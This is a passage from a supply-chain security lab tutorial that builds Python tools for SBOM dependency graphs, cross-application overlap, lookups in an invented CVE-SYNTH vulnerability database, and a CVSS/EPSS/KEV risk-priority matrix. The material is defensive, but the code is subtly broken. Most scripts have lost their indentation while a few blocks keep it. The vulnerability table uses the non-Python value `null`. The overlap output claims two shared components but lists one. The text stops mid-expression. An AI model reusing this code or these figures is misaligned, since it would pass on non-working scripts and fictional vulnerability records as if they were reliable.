for child in dep.get("dependsOn", []):
if parent in G and child in G:
G.add_edge(parent, child)
elif parent in G:
# Child might be a transitive dep not in top-level components
G.add_node(child, name=child, version="unknown",
node_type="transitive")
G.add_edge(parent, child)
return G
def analyze_graph(G: nx.DiGraph, sbom_name: str):
"""Compute and display dependency metrics."""
print(f"\n{'='*70}")
print(f"Dependency Analysis: {sbom_name}")
print(f"{'='*70}")
print(f"\n--- Graph Metrics ---")
print(f"Total nodes (components): {G.number_of_nodes()}")
print(f"Total edges (dependencies): {G.number_of_edges()}")
print(f"Graph density: {nx.density(G):.4f}")
# Find root nodes (no incoming edges)
roots = [n for n in G.nodes() if G.in_degree(n) == 0]
print(f"Root components: {len(roots)}")
# Find leaf nodes (no outgoing edges)
leaves = [n for n in G.nodes() if G.out_degree(n) == 0]
print(f"Leaf components (no deps): {len(leaves)}")
    # Dependency depth (longest root-to-leaf path, counted in nodes).
    # all_simple_paths yields nothing when no path exists, so no exception
    # handling is needed (it never raises NetworkXNoPath)
    max_depth = 0
    deepest_path = []
    for root in roots:
        for leaf in leaves:
            if root == leaf:
                continue
            for path in nx.all_simple_paths(G, root, leaf):
                if len(path) > max_depth:
                    max_depth = len(path)
                    deepest_path = path
print(f"\n--- Depth Analysis ---")
print(f"Maximum dependency depth: {max_depth}")
if deepest_path:
print(f"Deepest path:")
for i, node in enumerate(deepest_path):
name = G.nodes[node].get("name", node)
version = G.nodes[node].get("version", "?")
indent = " " * i
connector = "└── " if i > 0 else ""
print(f" {indent}{connector}{name}@{version}")
# Breadth analysis (most depended-upon packages)
print(f"\n--- Breadth Analysis (Most Depended-Upon) ---")
in_degrees = sorted(
[(n, G.in_degree(n)) for n in G.nodes()],
key=lambda x: -x[1]
)
print(f" {'Component':<40} {'Dependents':<10}")
print(f" {'-'*40} {'-'*10}")
for node, degree in in_degrees[:10]:
name = G.nodes[node].get("name", node)
if degree > 0:
print(f" {name:<40} {degree:<10}")
# Fan-out analysis (components with most dependencies)
print(f"\n--- Fan-Out Analysis (Most Dependencies) ---")
out_degrees = sorted(
[(n, G.out_degree(n)) for n in G.nodes()],
key=lambda x: -x[1]
)
print(f" {'Component':<40} {'Dependencies':<10}")
print(f" {'-'*40} {'-'*10}")
for node, degree in out_degrees[:10]:
name = G.nodes[node].get("name", node)
if degree > 0:
print(f" {name:<40} {degree:<10}")
# Cycle detection
print(f"\n--- Cycle Detection ---")
cycles = list(nx.simple_cycles(G))
if cycles:
print(f" WARNING: {len(cycles)} dependency cycle(s) detected!")
for i, cycle in enumerate(cycles[:5]):
names = [G.nodes[n].get("name", n) for n in cycle]
print(f" Cycle {i+1}: {' -> '.join(names)} -> {names[0]}")
else:
print(f" No dependency cycles detected. ✓")
# Transitive dependency ratio
direct_deps = set()
for root in roots:
for successor in G.successors(root):
direct_deps.add(successor)
transitive = G.number_of_nodes() - len(direct_deps) - len(roots)
print(f"\n--- Dependency Ratio ---")
print(f"Direct dependencies: {len(direct_deps)}")
print(f"Transitive dependencies: {max(0, transitive)}")
if len(direct_deps) > 0:
ratio = max(0, transitive) / len(direct_deps)
print(f"Transitive/Direct ratio: {ratio:.2f}")
if ratio > 5:
print(f" ⚠ HIGH transitive ratio — supply chain risk is elevated")
elif ratio > 2:
print(f" ⚠ MODERATE transitive ratio — review critical paths")
else:
print(f" ✓ Transitive ratio is manageable")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python dependency_tree.py <sbom-cdx.json> [...]")
sys.exit(1)
for path in sys.argv[1:]:
G = build_dependency_graph(path)
analyze_graph(G, Path(path).stem)
DEP_TREE
chmod +x ~/lab31-sbom/scripts/dependency_tree.py
Run the dependency tree analyzer:
python3 ~/lab31-sbom/scripts/dependency_tree.py \
    sboms/web-portal-syft-cdx.json
Expected output:
======================================================================
Dependency Analysis: web-portal-syft-cdx
======================================================================
--- Graph Metrics ---
Total nodes (components): 27
Total edges (dependencies): 25
Graph density: 0.0356
Root components: 1
Leaf components (no deps): 18
--- Depth Analysis ---
Maximum dependency depth: 3
Deepest path:
meridian-web-portal@3.8.2
└── express@4.18.2
└── cookie-parser@1.4.6
--- Breadth Analysis (Most Depended-Upon) ---
Component Dependents
---------------------------------------- ----------
express 1
lodash 1
jsonwebtoken 1
...
--- Fan-Out Analysis (Most Dependencies) ---
Component Dependencies
---------------------------------------- ----------
meridian-web-portal 20
--- Cycle Detection ---
No dependency cycles detected. ✓
--- Dependency Ratio ---
Direct dependencies: 20
Transitive dependencies: 6
Transitive/Direct ratio: 0.30
✓ Transitive ratio is manageable
2.3 — Cross-Application Dependency Overlap¶
Why Overlap Matters
Shared dependencies across applications amplify supply chain risk. A single compromised library (like the XZ Utils backdoor — see Chapter 24) can impact multiple services simultaneously.
cat > ~/lab31-sbom/scripts/overlap_analysis.py << 'OVERLAP'
#!/usr/bin/env python3
"""
Cross-Application Dependency Overlap Analyzer.
Identifies shared components across multiple SBOMs.
"""
import json
import sys
from collections import defaultdict
def extract_components(sbom_path: str) -> dict:
"""Extract name:version pairs from a CycloneDX SBOM."""
with open(sbom_path) as f:
data = json.load(f)
components = {}
for comp in data.get("components", []):
key = f"{comp['name']}@{comp.get('version', 'unknown')}"
components[key] = {
"name": comp["name"],
"version": comp.get("version", "unknown"),
"purl": comp.get("purl", "N/A"),
}
return components
def analyze_overlap(sbom_files: dict):
"""Analyze component overlap across multiple SBOMs."""
all_components = {}
for app_name, path in sbom_files.items():
all_components[app_name] = extract_components(path)
# Find shared components
component_presence = defaultdict(list)
for app_name, components in all_components.items():
for comp_key in components:
component_presence[comp_key].append(app_name)
shared = {k: v for k, v in component_presence.items() if len(v) > 1}
print(f"\n{'='*70}")
print(f"Cross-Application Dependency Overlap Analysis")
print(f"{'='*70}")
print(f"\nApplications analyzed: {len(sbom_files)}")
for name in sbom_files:
count = len(all_components[name])
print(f" {name}: {count} components")
total_unique = len(component_presence)
print(f"\nTotal unique components: {total_unique}")
print(f"Shared components: {len(shared)}")
if total_unique > 0:
print(f"Overlap percentage: {len(shared)/total_unique*100:.1f}%")
if shared:
print(f"\n--- Shared Components ---")
print(f" {'Component':<45} {'Present In'}")
print(f" {'-'*45} {'-'*30}")
for comp, apps in sorted(shared.items()):
print(f" {comp:<45} {', '.join(apps)}")
print(f"\n--- Risk Assessment ---")
print(f" Components shared across ALL applications:")
shared_all = {k: v for k, v in shared.items()
if len(v) == len(sbom_files)}
if shared_all:
for comp in sorted(shared_all):
print(f" ⚠ {comp} — compromise affects ALL services")
else:
print(f" None — good isolation between application stacks")
else:
print(f"\n No shared components detected (different ecosystems).")
if __name__ == "__main__":
sbom_files = {
"web-portal": "sboms/web-portal-syft-cdx.json",
"data-pipeline": "sboms/data-pipeline-syft-cdx.json",
"api-gateway": "sboms/api-gateway-syft-cdx.json",
}
analyze_overlap(sbom_files)
OVERLAP
chmod +x ~/lab31-sbom/scripts/overlap_analysis.py
Run (from ~/lab31-sbom, since the SBOM paths in the script are relative):
python3 ~/lab31-sbom/scripts/overlap_analysis.py
Expected output:
======================================================================
Cross-Application Dependency Overlap Analysis
======================================================================
Applications analyzed: 3
web-portal: 26 components
data-pipeline: 22 components
api-gateway: 16 components
Total unique components: 62
Shared components: 2
Overlap percentage: 3.2%
--- Shared Components ---
Component Present In
--------------------------------------------- ------------------------------
jsonwebtoken@9.0.0 web-portal, api-gateway
--- Risk Assessment ---
Components shared across ALL applications:
None — good isolation between application stacks
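Shared components are also a blast-radius question: which single library, if compromised, reaches the most services? A minimal standalone sketch, using an inline presence map in place of the component_presence dict the script builds:

```python
# Rank components by blast radius: how many applications a single
# compromised component would reach. The presence map below is inline
# sample data standing in for analyze_overlap's component_presence.
presence = {
    "jsonwebtoken@9.0.0": ["web-portal", "api-gateway"],
    "express@4.18.2": ["web-portal"],
    "cryptography@41.0.5": ["data-pipeline"],
}

# Sort by number of affected applications, descending.
blast_radius = sorted(presence.items(), key=lambda kv: -len(kv[1]))
for comp, apps in blast_radius:
    print(f"{comp}: {len(apps)} app(s) affected -> {', '.join(apps)}")
```

The same ranking, fed with real presence data, is a quick way to decide which shared library deserves pinning, mirroring, or extra monitoring first.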
Phase 3: Vulnerability Correlation¶
Objective¶
Cross-reference SBOM components against vulnerability databases to build a risk-prioritized remediation queue.
3.1 — Scan SBOMs with Grype¶
Grype (Anchore) scans SBOMs directly for known vulnerabilities.
# ── Scan web portal SBOM ──
grype sbom:sboms/web-portal-syft-cdx.json \
--output json \
--file analysis/web-portal-vulns.json
# ── Scan data pipeline SBOM ──
grype sbom:sboms/data-pipeline-syft-cdx.json \
--output json \
--file analysis/data-pipeline-vulns.json
# ── Scan API gateway SBOM ──
grype sbom:sboms/api-gateway-syft-cdx.json \
--output json \
--file analysis/api-gateway-vulns.json
# ── Human-readable table output ──
grype sbom:sboms/web-portal-syft-cdx.json --output table
Expected table output (web portal):
NAME INSTALLED FIXED-IN TYPE VULNERABILITY SEVERITY
axios 1.6.0 1.6.1 npm CVE-SYNTH-2026-1001 Medium
jsonwebtoken 9.0.0 9.0.1 npm CVE-SYNTH-2026-1002 High
lodash 4.17.21 npm CVE-SYNTH-2026-1003 Low
moment 2.29.4 2.30.1 npm CVE-SYNTH-2026-1004 Medium
semver 7.5.4 7.5.5 npm CVE-SYNTH-2026-1005 High
express 4.18.2 4.19.0 npm CVE-SYNTH-2026-1006 Medium
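The JSON reports written by the scans above can be rolled up into severity counts. This sketch assumes Grype's JSON layout (a top-level matches array whose entries carry a vulnerability object with a severity field) and uses an inline sample document instead of the real analysis/*.json files:

```python
import json
from collections import Counter

# Inline sample mimicking Grype's JSON report shape; in the lab the
# real reports live in analysis/*-vulns.json.
report = json.loads("""
{"matches": [
  {"vulnerability": {"id": "CVE-SYNTH-2026-1002", "severity": "High"}},
  {"vulnerability": {"id": "CVE-SYNTH-2026-1001", "severity": "Medium"}},
  {"vulnerability": {"id": "CVE-SYNTH-2026-1003", "severity": "Low"}}
]}
""")

# Count findings per severity tier.
severity_counts = Counter(m["vulnerability"]["severity"] for m in report["matches"])
for sev, count in severity_counts.most_common():
    print(f"{sev:<8} {count}")
```

Swapping the inline sample for `json.load(open("analysis/web-portal-vulns.json"))` gives the same roll-up for the actual scan output.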
3.2 — Query OSV API for Vulnerability Data¶
OSV (Open Source Vulnerabilities) Database
The OSV database provides a unified schema for vulnerability data across ecosystems. Query it programmatically to get detailed vulnerability information including affected version ranges.
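For reference, the production endpoint accepts a POST whose JSON body names the package. A minimal sketch of building that body per the OSV v1 query schema (no network call is made here; axios/npm/1.6.0 are example inputs):

```python
import json

def build_osv_query(name: str, ecosystem: str, version: str) -> dict:
    """Build a request body for POST https://api.osv.dev/v1/query."""
    return {"version": version, "package": {"name": name, "ecosystem": ecosystem}}

payload = build_osv_query("axios", "npm", "1.6.0")
print(json.dumps(payload))
# In production, POST this body (e.g. with urllib.request or requests)
# and read the "vulns" array from the response.
```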
cat > ~/lab31-sbom/scripts/osv_query.py << 'OSV_QUERY'
#!/usr/bin/env python3
"""
OSV API Query Tool — Cross-references SBOM components against the OSV database.
Lab 31: SBOM Analysis & Supply Chain Security
NOTE: In this lab we use synthetic vulnerability data. In production,
this script queries the real OSV API at https://api.osv.dev/v1/query
"""
import json
import sys
from dataclasses import dataclass
from typing import Optional
# ── Synthetic vulnerability database (simulates OSV API responses) ──
SYNTHETIC_VULNS = {
"pkg:npm/axios@1.6.0": [
{
"id": "CVE-SYNTH-2026-1001",
"summary": "Server-Side Request Forgery in axios HTTP client",
"details": "axios before 1.6.1 allows SSRF via crafted URL in proxy configuration. An attacker can manipulate the proxy settings to redirect requests to internal services.",
"severity": "MEDIUM",
"cvss_score": 6.5,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"affected_versions": ">=1.0.0, <1.6.1",
"fixed_version": "1.6.1",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1001",
"https://github.internal.example.com/advisories/SYNTH-2026-001"
],
"epss_score": 0.42,
"epss_percentile": 0.89,
"cisa_kev": False,
}
],
"pkg:npm/jsonwebtoken@9.0.0": [
{
"id": "CVE-SYNTH-2026-1002",
"summary": "Algorithm confusion in jsonwebtoken allows authentication bypass",
"details": "jsonwebtoken before 9.0.1 is vulnerable to algorithm confusion attacks when the 'algorithms' option is not explicitly set. An attacker can craft a JWT using HMAC with the RSA public key to bypass signature verification.",
"severity": "HIGH",
"cvss_score": 8.1,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"affected_versions": ">=8.0.0, <9.0.1",
"fixed_version": "9.0.1",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1002",
"https://github.internal.example.com/advisories/SYNTH-2026-002"
],
"epss_score": 0.78,
"epss_percentile": 0.96,
"cisa_kev": True,
}
],
"pkg:npm/semver@7.5.4": [
{
"id": "CVE-SYNTH-2026-1005",
"summary": "ReDoS vulnerability in semver range parsing",
"details": "semver before 7.5.5 is vulnerable to Regular Expression Denial of Service (ReDoS) when parsing crafted version ranges. Exponential backtracking in the range regex allows denial of service.",
"severity": "HIGH",
"cvss_score": 7.5,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"affected_versions": ">=7.0.0, <7.5.5",
"fixed_version": "7.5.5",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1005"
],
"epss_score": 0.15,
"epss_percentile": 0.65,
"cisa_kev": False,
}
],
"pkg:npm/express@4.18.2": [
{
"id": "CVE-SYNTH-2026-1006",
"summary": "Open redirect in express via malformed URL handling",
"details": "express before 4.19.0 does not properly sanitize redirect URLs, allowing attackers to redirect users to arbitrary external sites via specially crafted paths.",
"severity": "MEDIUM",
"cvss_score": 5.4,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"affected_versions": ">=4.0.0, <4.19.0",
"fixed_version": "4.19.0",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1006"
],
"epss_score": 0.31,
"epss_percentile": 0.82,
"cisa_kev": False,
}
],
"pkg:npm/moment@2.29.4": [
{
"id": "CVE-SYNTH-2026-1004",
"summary": "Path traversal in moment locale loading",
"details": "moment before 2.30.1 allows path traversal when loading locale files from user-controlled input, potentially exposing sensitive server files.",
"severity": "MEDIUM",
"cvss_score": 6.1,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"affected_versions": ">=2.0.0, <2.30.1",
"fixed_version": "2.30.1",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1004"
],
"epss_score": 0.08,
"epss_percentile": 0.45,
"cisa_kev": False,
}
],
"pkg:npm/lodash@4.17.21": [
{
"id": "CVE-SYNTH-2026-1003",
"summary": "Prototype pollution in lodash merge functions",
"details": "lodash 4.17.21 contains a prototype pollution vulnerability in the merge, mergeWith, and defaultsDeep functions. While the direct exploitability is limited, it can be chained with application-specific gadgets.",
"severity": "LOW",
"cvss_score": 3.7,
"cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"affected_versions": "<=4.17.21",
"fixed_version": null,
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-1003"
],
"epss_score": 0.02,
"epss_percentile": 0.18,
"cisa_kev": False,
}
],
"pkg:pypi/cryptography@41.0.5": [
{
"id": "CVE-SYNTH-2026-2001",
"summary": "Buffer overflow in cryptography RSA OAEP decryption",
"details": "cryptography before 41.0.7 contains a buffer overflow in the RSA OAEP decryption path via a crafted ciphertext. This can lead to denial of service or potentially remote code execution.",
"severity": "CRITICAL",
"cvss_score": 9.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"affected_versions": ">=40.0.0, <41.0.7",
"fixed_version": "41.0.7",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-2001"
],
"epss_score": 0.91,
"epss_percentile": 0.99,
"cisa_kev": True,
}
],
"pkg:pypi/pillow@10.1.0": [
{
"id": "CVE-SYNTH-2026-2002",
"summary": "Heap overflow in Pillow TIFF image parsing",
"details": "Pillow before 10.2.0 has a heap-based buffer overflow in the TIFF image parser when handling crafted IFD entries, potentially leading to remote code execution.",
"severity": "HIGH",
"cvss_score": 8.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"affected_versions": ">=10.0.0, <10.2.0",
"fixed_version": "10.2.0",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-2002"
],
"epss_score": 0.55,
"epss_percentile": 0.92,
"cisa_kev": False,
}
],
"pkg:pypi/jinja2@3.1.2": [
{
"id": "CVE-SYNTH-2026-2003",
"summary": "Sandbox escape in Jinja2 template engine",
"details": "Jinja2 before 3.1.3 allows sandbox escape via crafted template expressions that access restricted attributes through undocumented internal methods.",
"severity": "HIGH",
"cvss_score": 7.5,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"affected_versions": ">=3.0.0, <3.1.3",
"fixed_version": "3.1.3",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-2003"
],
"epss_score": 0.35,
"epss_percentile": 0.85,
"cisa_kev": False,
}
],
"pkg:pypi/paramiko@3.3.1": [
{
"id": "CVE-SYNTH-2026-2004",
"summary": "Authentication bypass in Paramiko SFTP client",
"details": "Paramiko before 3.4.0 improperly validates host keys in specific configurations, allowing man-in-the-middle attacks against SFTP connections.",
"severity": "MEDIUM",
"cvss_score": 6.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N",
"affected_versions": ">=3.0.0, <3.4.0",
"fixed_version": "3.4.0",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-2004"
],
"epss_score": 0.12,
"epss_percentile": 0.58,
"cisa_kev": False,
}
],
"pkg:maven/org.apache.logging.log4j/log4j-core@2.22.0": [
{
"id": "CVE-SYNTH-2026-3001",
"summary": "Information disclosure in Log4j2 thread context map",
"details": "Apache Log4j2 2.22.0 may expose sensitive data from ThreadContext maps in log output when specific pattern layouts are used, potentially leaking authentication tokens or session IDs to log aggregators.",
"severity": "MEDIUM",
"cvss_score": 5.3,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"affected_versions": ">=2.20.0, <2.23.0",
"fixed_version": "2.23.0",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-3001"
],
"epss_score": 0.22,
"epss_percentile": 0.75,
"cisa_kev": False,
}
],
"pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.16.0": [
{
"id": "CVE-SYNTH-2026-3002",
"summary": "Deserialization gadget chain in Jackson Databind",
"details": "jackson-databind 2.16.0 contains a new deserialization gadget chain via the com.example.internal.GadgetClass that can lead to remote code execution when default typing is enabled.",
"severity": "HIGH",
"cvss_score": 8.1,
"cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"affected_versions": ">=2.16.0, <2.16.1",
"fixed_version": "2.16.1",
"references": [
"https://nvd-mirror.internal.example.com/vuln/CVE-SYNTH-2026-3002"
],
"epss_score": 0.68,
"epss_percentile": 0.95,
"cisa_kev": False,
}
],
}
def query_vulns_for_sbom(sbom_path: str) -> list[dict]:
"""Query synthetic vulnerability database for all components in an SBOM."""
with open(sbom_path) as f:
data = json.load(f)
results = []
for comp in data.get("components", []):
purl = comp.get("purl", "")
if purl in SYNTHETIC_VULNS:
for vuln in SYNTHETIC_VULNS[purl]:
results.append({
"component": comp.get("name"),
"version": comp.get("version"),
"purl": purl,
**vuln,
})
return results
def print_vuln_report(results: list[dict], app_name: str):
"""Print a formatted vulnerability report."""
print(f"\n{'='*70}")
print(f"Vulnerability Report: {app_name}")
print(f"{'='*70}")
print(f"Total vulnerabilities found: {len(results)}")
# Severity breakdown
severity_counts = {}
for r in results:
sev = r["severity"]
severity_counts[sev] = severity_counts.get(sev, 0) + 1
severity_order = ["CRITICAL", "HIGH", "MEDIUM", "LOW"]
print(f"\nSeverity breakdown:")
for sev in severity_order:
count = severity_counts.get(sev, 0)
bar = "█" * count
print(f" {sev:<10} {count:>3} {bar}")
# CISA KEV check
kev_vulns = [r for r in results if r.get("cisa_kev")]
if kev_vulns:
print(f"\n⚠ CISA KEV (Known Exploited Vulnerabilities): {len(kev_vulns)}")
for v in kev_vulns:
print(f" CRITICAL: {v['id']} — {v['component']}@{v['version']}")
print(f" {v['summary']}")
# Detailed vulnerability table
print(f"\n--- Detailed Findings ---")
sorted_results = sorted(results, key=lambda x: -x["cvss_score"])
for v in sorted_results:
print(f"\n [{v['severity']}] {v['id']}")
print(f" Component: {v['component']}@{v['version']}")
print(f" CVSS Score: {v['cvss_score']} ({v['cvss_vector']})")
print(f" EPSS Score: {v['epss_score']:.2f} (percentile: {v['epss_percentile']:.2f})")
print(f" CISA KEV: {'YES — IMMEDIATE ACTION REQUIRED' if v['cisa_kev'] else 'No'}")
print(f" Fix Version: {v['fixed_version'] or 'No fix available'}")
print(f" Summary: {v['summary']}")
return results
if __name__ == "__main__":
sboms = {
"meridian-web-portal": "sboms/web-portal-syft-cdx.json",
"meridian-data-pipeline": "sboms/data-pipeline-syft-cdx.json",
"meridian-api-gateway": "sboms/api-gateway-syft-cdx.json",
}
all_vulns = []
for app_name, path in sboms.items():
results = query_vulns_for_sbom(path)
print_vuln_report(results, app_name)
all_vulns.extend(results)
# Summary across all applications
print(f"\n{'='*70}")
print(f"AGGREGATE VULNERABILITY SUMMARY")
print(f"{'='*70}")
print(f"Total vulnerabilities across all applications: {len(all_vulns)}")
kev_total = sum(1 for v in all_vulns if v.get("cisa_kev"))
print(f"CISA KEV entries: {kev_total}")
critical = sum(1 for v in all_vulns if v["severity"] == "CRITICAL")
high = sum(1 for v in all_vulns if v["severity"] == "HIGH")
print(f"Critical + High: {critical + high}")
print(f"Mean EPSS score: {sum(v['epss_score'] for v in all_vulns) / len(all_vulns):.2f}")
OSV_QUERY
chmod +x ~/lab31-sbom/scripts/osv_query.py
Run (from ~/lab31-sbom):
python3 ~/lab31-sbom/scripts/osv_query.py
3.3 — Build Risk Priority Matrix¶
Prioritization Is Not Optional
Without a risk priority matrix, teams patch in CVSS order, which frequently misses actively exploited low-CVSS vulnerabilities. Combine CVSS, EPSS, CISA KEV status, and business context for effective prioritization. See Chapter 54 — SBOM Operations for the full framework.
cat > ~/lab31-sbom/scripts/risk_matrix.py << 'RISK_MATRIX'
#!/usr/bin/env python3
"""
Risk Priority Matrix Builder — Combines CVSS, EPSS, KEV, and business context
to produce an actionable remediation priority queue.
Lab 31: SBOM Analysis & Supply Chain Security
"""
import json
import sys
from dataclasses import dataclass
# Import our synthetic vulnerability data
sys.path.insert(0, "scripts")
from osv_query import SYNTHETIC_VULNS, query_vulns_for_sbom
# ── Business context for each application ──
BUSINESS_CONTEXT = {
"meridian-web-portal": {
"exposure": "internet-facing",
"data_sensitivity": "high",
"availability_requirement": "high",
"business_impact_score": 0.9,
},
"meridian-data-pipeline": {
"exposure": "internal-only",
"data_sensitivity": "high",
"availability_requirement": "medium",
"business_impact_score": 0.7,
},
"meridian-api-gateway": {
"exposure": "internet-facing",
"data_sensitivity": "high",
"availability_requirement": "critical",
"business_impact_score": 0.95,
},
}
@dataclass
class PrioritizedVuln:
vuln_id: str
component: str
version: str
app_name: str
cvss_score: float
epss_score: float
cisa_kev: bool
business_impact: float
risk_score: float
priority: str
action: str
sla_hours: int
def calculate_risk_score(vuln: dict, business_impact: float) -> float:
"""
Calculate composite risk score:
risk = (CVSS_normalized * 0.3) + (EPSS * 0.35) + (KEV_bonus * 0.15) + (business_impact * 0.2)
This weighting deliberately emphasizes EPSS (real-world exploitability)
over CVSS (theoretical severity) based on industry research showing
EPSS is a better predictor of actual exploitation.
"""
cvss_normalized = vuln["cvss_score"] / 10.0
epss = vuln["epss_score"]
kev_bonus = 1.0 if vuln["cisa_kev"] else 0.0
score = (
(cvss_normalized * 0.30) +
(epss * 0.35) +
(kev_bonus * 0.15) +
(business_impact * 0.20)
)
return round(min(score, 1.0), 4)
def determine_priority(risk_score: float, cisa_kev: bool) -> tuple:
"""Determine priority tier, required action, and SLA."""
if cisa_kev or risk_score >= 0.8:
return ("P0-EMERGENCY", "Patch immediately, deploy hotfix", 24)
elif risk_score >= 0.6:
return ("P1-CRITICAL", "Patch within sprint, apply virtual patch", 72)
elif risk_score >= 0.4:
return ("P2-HIGH", "Schedule patch in next release cycle", 168)
elif risk_score >= 0.2:
return ("P3-MEDIUM", "Add to backlog, monitor for exploitation", 720)
else:
return ("P4-LOW", "Accept risk or patch opportunistically", 2160)
def build_priority_matrix():
"""Build and display the full risk priority matrix."""
sboms = {
"meridian-web-portal": "sboms/web-portal-syft-cdx.json",
"meridian-data-pipeline": "sboms/data-pipeline-syft-cdx.json",
"meridian-api-gateway": "sboms/api-gateway-syft-cdx.json",
}
prioritized = []
for app_name, path in sboms.items():
vulns = query_vulns_for_sbom(path)
biz = BUSINESS_CONTEXT[app_name]
for v in vulns:
risk_score = calculate_risk_score(v, biz["business_impact_score"])
priority, action, sla = determine_priority(risk_score, v["cisa_kev"])
pv = PrioritizedVuln(
vuln_id=v["id"],
component=v["component"],
version=v["version"],
app_name=app_name,
cvss_score=v["cvss_score"],
epss_score=v["epss_score"],
cisa_kev=v["cisa_kev"],
business_impact=biz["business_impact_score"],
risk_score=risk_score,
priority=priority,
action=action,
sla_hours=sla,
)
prioritized.append(pv)
# Sort by risk score descending
prioritized.sort(key=lambda x: -x.risk_score)
print(f"\n{'='*90}")
print(f"RISK PRIORITY MATRIX — Meridian Software Corp")
print(f"{'='*90}")
print(f"Generated: 2026-04-12T10:30:00Z")
print(f"Analyst: testuser (security-engineering@internal.example.com)")
print(f"Total vulnerabilities: {len(prioritized)}")
print()
# Priority tier summary
tier_counts = {}
for pv in prioritized:
tier_counts[pv.priority] = tier_counts.get(pv.priority, 0) + 1
print(f"Priority Distribution:")
for tier in ["P0-EMERGENCY", "P1-CRITICAL", "P2-HIGH", "P3-MEDIUM", "P4-LOW"]:
count = tier_counts.get(tier, 0)
bar = "█" * (count * 3)
print(f" {tier:<15} {count:>3} {bar}")
print(f"\n{'─'*90}")
print(f"{'Priority':<15} {'Vuln ID':<25} {'Component':<20} {'App':<22} {'CVSS':>5} {'EPSS':>5} {'Risk':>6} {'SLA':>6}")
print(f"{'─'*90}")
for pv in prioritized:
kev_flag = " ★" if pv.cisa_kev else ""
print(f"{pv.priority:<15} {pv.vuln_id:<25} {pv.component:<20} {pv.app_name:<22} {pv.cvss_score:>5.1f} {pv.epss_score:>5.2f} {pv.risk_score:>6.4f} {pv.sla_hours:>4}h{kev_flag}")
print(f"{'─'*90}")
# Actionable recommendations
print(f"\n--- Immediate Actions Required ---")
emergencies = [pv for pv in prioritized if pv.priority == "P0-EMERGENCY"]
if emergencies:
for pv in emergencies:
print(f"\n ★ {pv.vuln_id} — {pv.component}@{pv.version}")
print(f" Application: {pv.app_name}")
print(f" Action: {pv.action}")
print(f" SLA: {pv.sla_hours} hours")
print(f" Risk Score: {pv.risk_score:.4f}")
else:
print(f" No P0-EMERGENCY items. Review P1-CRITICAL items for the current sprint.")
# Save to JSON for reporting
output = {
"report_metadata": {
"generated": "2026-04-12T10:30:00Z",
"analyst": "testuser",
"total_vulnerabilities": len(prioritized),
},
"priority_matrix": [
{
"priority": pv.priority,
"vuln_id": pv.vuln_id,
"component": f"{pv.component}@{pv.version}",
"application": pv.app_name,
"cvss_score": pv.cvss_score,
"epss_score": pv.epss_score,
"cisa_kev": pv.cisa_kev,
"risk_score": pv.risk_score,
"action": pv.action,
"sla_hours": pv.sla_hours,
}
for pv in prioritized
],
}
with open("reports/risk-priority-matrix.json", "w") as f:
json.dump(output, f, indent=2)
print(f"\n Report saved to reports/risk-priority-matrix.json")
if __name__ == "__main__":
build_priority_matrix()
RISK_MATRIX
chmod +x ~/lab31-sbom/scripts/risk_matrix.py
Run (from ~/lab31-sbom, since the script imports from scripts/ and writes to reports/):
python3 ~/lab31-sbom/scripts/risk_matrix.py
Expected output (abbreviated):
==========================================================================================
RISK PRIORITY MATRIX — Meridian Software Corp
==========================================================================================
Generated: 2026-04-12T10:30:00Z
Analyst: testuser (security-engineering@internal.example.com)
Total vulnerabilities: 12
Priority Distribution:
P0-EMERGENCY 2 ██████
P1-CRITICAL 1 ███
P2-HIGH 6 ██████████████████
P3-MEDIUM 3 █████████
P4-LOW 0
──────────────────────────────────────────────────────────────────────────────────────────
Priority Vuln ID Component App CVSS EPSS Risk SLA
──────────────────────────────────────────────────────────────────────────────────────────
P0-EMERGENCY CVE-SYNTH-2026-2001 cryptography meridian-data-pipeline 9.8 0.91 0.9025 24h ★
P0-EMERGENCY CVE-SYNTH-2026-1002 jsonwebtoken meridian-web-portal 8.1 0.78 0.8460 24h ★
P1-CRITICAL CVE-SYNTH-2026-3002 jackson-databind meridian-api-gateway 8.1 0.68 0.6710 72h
...
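As a sanity check on the table above, the composite score from calculate_risk_score can be reproduced by hand. The inputs below (CVSS 8.0, EPSS 0.50, not on KEV, business impact 0.90) are hypothetical:

```python
# Reproduce the composite risk formula from calculate_risk_score
# with hypothetical inputs.
cvss, epss, kev, biz = 8.0, 0.50, False, 0.90
risk = round(min(
    (cvss / 10.0) * 0.30            # normalized CVSS, weight 0.30
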